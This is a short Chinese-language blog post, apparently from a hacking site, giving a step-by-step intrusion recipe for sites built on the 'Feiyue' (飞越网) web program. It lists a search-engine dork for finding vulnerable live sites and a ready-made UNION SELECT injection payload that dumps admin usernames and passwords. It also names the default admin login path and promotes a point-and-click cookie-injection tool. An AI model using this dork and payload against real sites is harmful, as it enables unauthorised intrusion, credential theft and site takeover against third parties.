飞越网程序网站cookies注入漏洞

手工检测方法: 百度或谷歌关键字 inurl:/imagebig_honor.asp?id=
选择标题为图片的连接
返回首页—新闻中心—随便选择一篇新闻。有些防注入,需要注入中转,不会注入中转的就看下面的工具入侵

在连接后面直接加上爆用户名密码代码: %20and%201=2%20union%20select% 201,username,password,4,5,6,7,8,9,10,11%20from%20admin

默认后台 /admin/Login.asp

如果大家觉得麻烦也可以尝试用工具进行cookies注入

傻瓜式操作:第一步 第二部 第三部

百度网盘下载地址:  

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: